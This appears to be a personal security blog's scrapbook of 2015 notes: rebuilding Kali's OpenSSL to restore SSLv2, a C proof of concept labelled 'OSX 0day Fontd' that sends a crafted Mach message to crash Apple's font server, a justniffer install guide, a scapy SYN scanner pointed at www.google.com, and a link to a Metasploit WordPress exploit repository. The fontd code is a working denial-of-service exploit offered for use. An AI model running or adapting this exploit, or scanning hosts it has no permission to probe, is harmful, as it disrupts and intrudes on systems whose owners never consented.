May 1, 2015

Howto: Fix SSLv2 in Kali

Source:: http://blog.opensecurityresearch.com/2013/05/fixing-sslv2-support-in-kali-linux.html

Test with `openssl s_client -connect www.opensecurityresearch.com:443 -ssl2`

1.  Install quilt
# apt-get install devscripts quilt

2.  Install source of openssl
# apt-get source openssl

3. Removing patch
# cd openssl-1.0.1e
# quilt pop -a

4. Edit the "debian/patches/series" file and delete the line that says "ssltest_no_sslv2.patch".

5. Edit "debian/rules" and delete the "no-ssl2" argument.

6. Repatch
# quilt pop -a

7. Quick fix
# dch -n 'Allow SSLv2'

8. Rebuild package
# dpkg-source --commit
# debuild -uc -us

9. Reinstall ssl package
# dpkg -i *ssl*.deb

10. Run the test from the top of this note again.

OSX 0day Fontd

 
#include <stdio.h>
#include <stdlib.h>
#include <mach/mach.h>
#include <servers/bootstrap.h>
 
/* Bootstrap service name looked up in main() to obtain the server's send right. */
#define SERVICE_NAME "com.apple.FontObjectsServer"
/* Value placed in msgh_id of the outgoing message header. */
#define DEFAULT_MSG_ID 46

/*
 * Prints a Mach error and exits when `kr` differs from `success_retval`.
 * Note: `kr` is not a parameter -- the macro silently relies on a
 * `kern_return_t kr` in the enclosing scope.  It is a bare `if` rather than
 * a `do { ... } while (0)` body, so it must not be followed by an `else`,
 * and `msg`/`success_retval` are expanded unparenthesized.
 */
#define EXIT_ON_MACH_ERROR(msg, retval, success_retval) if (kr != success_retval) { mach_error(msg ":" , kr); exit((retval)); }

/*
 * Layout of the complex (MACH_MSGH_BITS_COMPLEX) message that main() sends:
 * the fixed header, the descriptor count (set to 1), and a single 64-bit
 * out-of-line memory descriptor pointing at a `hi_msg`.
 */
typedef struct {
mach_msg_header_t header;
mach_msg_size_t descriptor_count;
mach_msg_ool_descriptor64_t desc;
} msg_format_send_t;
/*
 * Contents of the out-of-line region: three 32-bit fields, which main()
 * stores byte-swapped via __builtin_bswap32, followed by a 512-byte buffer
 * that main() fills with 0x90.  `size_data` is set to sizeof(data) (512).
 */
typedef struct {
u_int32_t int1;
u_int32_t int2;
u_int32_t size_data;
char data[512];
} hi_msg;
 
/*
 * Looks up SERVICE_NAME via the bootstrap server, builds one complex Mach
 * message whose out-of-line descriptor references a freshly allocated
 * `hi_msg`, sends it with mach_msg(), and exits.  argc/argv are unused.
 * Exits non-zero (via EXIT_ON_MACH_ERROR) if the lookup or the send fails.
 */
int main(int argc, char **argv) {
kern_return_t kr;
msg_format_send_t send_msg;
mach_msg_header_t *send_hdr;
mach_port_t server_port;
vm_address_t hi_addr = 0;   /* filled in by vm_allocate() below */
hi_msg *hello;

/* Obtain a send right to the service; on failure prints the error and exits with the value of kr. */
kr = bootstrap_look_up(bootstrap_port, SERVICE_NAME, &server_port);
EXIT_ON_MACH_ERROR("bootstrap_look_up", kr, BOOTSTRAP_SUCCESS);

/* NOTE(review): the kern_return_t from vm_allocate() is discarded; if the
 * allocation fails, hi_addr stays 0 and the writes through `hello` below
 * dereference a null pointer. */
        vm_allocate(mach_task_self(), &hi_addr, sizeof(hi_msg), VM_FLAGS_ANYWHERE);
hello = (hi_msg *)hi_addr;

/* Header: MOVE_SEND transfers our send right to the server with the message,
 * COMPLEX announces that a descriptor follows the header; no reply port. */
send_hdr = &(send_msg.header);
send_hdr->msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MOVE_SEND,0) | MACH_MSGH_BITS_COMPLEX;
send_hdr->msgh_size = sizeof(send_msg);
send_hdr->msgh_remote_port = server_port;
send_hdr->msgh_local_port = MACH_PORT_NULL;
send_hdr->msgh_id = DEFAULT_MSG_ID;
/* Body: exactly one out-of-line descriptor covering the whole hi_msg. */
send_msg.descriptor_count = 1;
send_msg.desc.address = (uint64_t)hello;
send_msg.desc.size = sizeof(hi_msg);
send_msg.desc.type = MACH_MSG_OOL_DESCRIPTOR;
printf("Sending... fontd will crash now.\n");
/* Payload fields are stored byte-swapped (big-endian on a little-endian host). */
hello->int1 = __builtin_bswap32(0x16);
hello->int2 = __builtin_bswap32(0x01);
hello->size_data = __builtin_bswap32(sizeof(hello->data));
/* NOTE(review): memset() is declared in <string.h>, which this file does not include. */
memset(hello->data, 0x90, sizeof(hello->data));

// send request
kr = mach_msg(send_hdr, // message buffer
                MACH_SEND_MSG, // option indicating send
                send_hdr->msgh_size, // size of header + body
                0, // receive limit
                MACH_PORT_NULL, // receive name
                MACH_MSG_TIMEOUT_NONE, // no timeout, wait forever
                MACH_PORT_NULL); // no notification port
EXIT_ON_MACH_ERROR("mach_msg(send)", kr, MACH_MSG_SUCCESS);

/* The out-of-line region is never deallocated; the process exits immediately. */
printf("Exiting\n");
exit(0);
}
 
 

Apr 30, 2015

Howto: install justniffer in CentOS 7

1. Install all requirements
autoconf-2.69-11.el7.noarch.rpm                 boost-thread-1.53.0-23.el7.x86_64.rpm
automake-1.13.4-3.el7.noarch.rpm                boost-timer-1.53.0-23.el7.x86_64.rpm
bash-4.2.46-12.el7.x86_64.rpm                   boost-wave-1.53.0-23.el7.x86_64.rpm
boost-1.53.0-23.el7.x86_64.rpm                  gcc-c++-4.8.3-9.el7.x86_64.rpm
boost-atomic-1.53.0-23.el7.x86_64.rpm           gcc-plugin-devel-4.8.3-9.el7.x86_64.rpm
boost-chrono-1.53.0-23.el7.x86_64.rpm           gmp-6.0.0-11.el7.x86_64.rpm
boost-context-1.53.0-23.el7.x86_64.rpm          gmp-devel-6.0.0-11.el7.x86_64.rpm
boost-date-time-1.53.0-23.el7.x86_64.rpm        libicu-50.1.2-11.el7.x86_64.rpm
boost-devel-1.53.0-23.el7.x86_64.rpm            libmpc-devel-1.0.1-3.el7.x86_64.rpm
boost-filesystem-1.53.0-23.el7.x86_64.rpm       libpcap-1.5.3-3.el7_0.1.x86_64.rpm
boost-graph-1.53.0-23.el7.x86_64.rpm            libpcap-devel-1.5.3-3.el7_0.1.x86_64.rpm
boost-iostreams-1.53.0-23.el7.x86_64.rpm        libstdc++-4.8.3-9.el7.x86_64.rpm
boost-locale-1.53.0-23.el7.x86_64.rpm           libstdc++-devel-4.8.3-9.el7.x86_64.rpm
boost-math-1.53.0-23.el7.x86_64.rpm             libtool-2.4.2-20.el7.x86_64.rpm
boost-program-options-1.53.0-23.el7.x86_64.rpm  libtool-ltdl-2.4.2-20.el7.x86_64.rpm
boost-python-1.53.0-23.el7.x86_64.rpm           libtool-ltdl-devel-2.4.2-20.el7.x86_64.rpm
boost-random-1.53.0-23.el7.x86_64.rpm           m4-1.4.16-9.el7.x86_64.rpm
boost-regex-1.53.0-23.el7.x86_64.rpm            mpfr-devel-3.1.1-4.el7.x86_64.rpm
boost-serialization-1.53.0-23.el7.x86_64.rpm    patch-2.7.1-8.el7.x86_64.rpm
boost-signals-1.53.0-23.el7.x86_64.rpm          perl-Data-Dumper-2.145-3.el7.x86_64.rpm
boost-system-1.53.0-23.el7.x86_64.rpm           perl-Test-Harness-3.28-2.el7.noarch.rpm

boost-test-1.53.0-23.el7.x86_64.rpm             perl-Thread-Queue-3.02-2.el7.noarch.rpm

2. Copy config.sub and config.guess from /usr/share/libtool/config/
# cp -pvr /usr/share/libtool/config/config.* justniffer-0.5.12/lib/libnids-1.21_patched/

3. Download Boost header 1.5.8
# wget "http://downloads.sourceforge.net/project/boost/boost/1.58.0/boost_1_58_0.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fboost%2Ffiles%2Fboost%2F1.58.0%2F&ts=1430407302&use_mirror=jaist" -O boost_1_58_0.tar.gz

4. Extract boost_1_58_0.tar.gz
# tar xzvf boost_1_58_0.tar.gz

5. Install Boost header 1.5.8
# ./bootstrap.sh
# ./b2 install --with=all

6. Export PATH
# export PATH=$PATH:/usr/local/bin/

7. Done
# justniffer




Howto: scan ports with scapy (python)

#!/usr/bin/env python
# Sends one TCP SYN to each of ports 20..29 on a single host with scapy and
# reports the port as open or closed according to the flags in the reply.
# Written for Python 2 (print statement, xrange, long literals such as 18L).

from scapy.all import *
import logging
# Raise the scapy.runtime logger threshold so only ERROR and above are shown.
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

for i in xrange(10):
      # Fixed source port 9999, destination port 20+i; sr1() returns the first reply.
      pkt=sr1(IP(dst='www.google.com')/TCP(sport=9999,dport=20+i, flags='S'))
      # NOTE(review): sr1() returns None when no reply arrives before its timeout;
      # pkt.getlayer(TCP) would then raise AttributeError -- confirm against the
      # scapy version in use.  A reply carrying no TCP layer (e.g. ICMP) is not
      # handled either.
      # 18 == 0x12 == SYN|ACK: the port accepted the connection attempt.
      if pkt.getlayer(TCP).flags == 18L:
            # The reply's source port is the port that was probed.
            print 'Port %s is open' %pkt.getlayer(TCP).sport
      # 20 == 0x14 == RST|ACK: the port refused the connection attempt.
      elif pkt.getlayer(TCP).flags == 20L:
            print 'Port %s is closed' %pkt.getlayer(TCP).sport

Tools: WPSploit - Exploiting Wordpress With Metasploit.

WPSploit

WPSploit - Exploiting Wordpress With Metasploit.

This repository is designed for creating and/or porting specific exploits for WordPress, using Metasploit as the exploitation tool.

Source:: https://github.com/espreto/wpsploit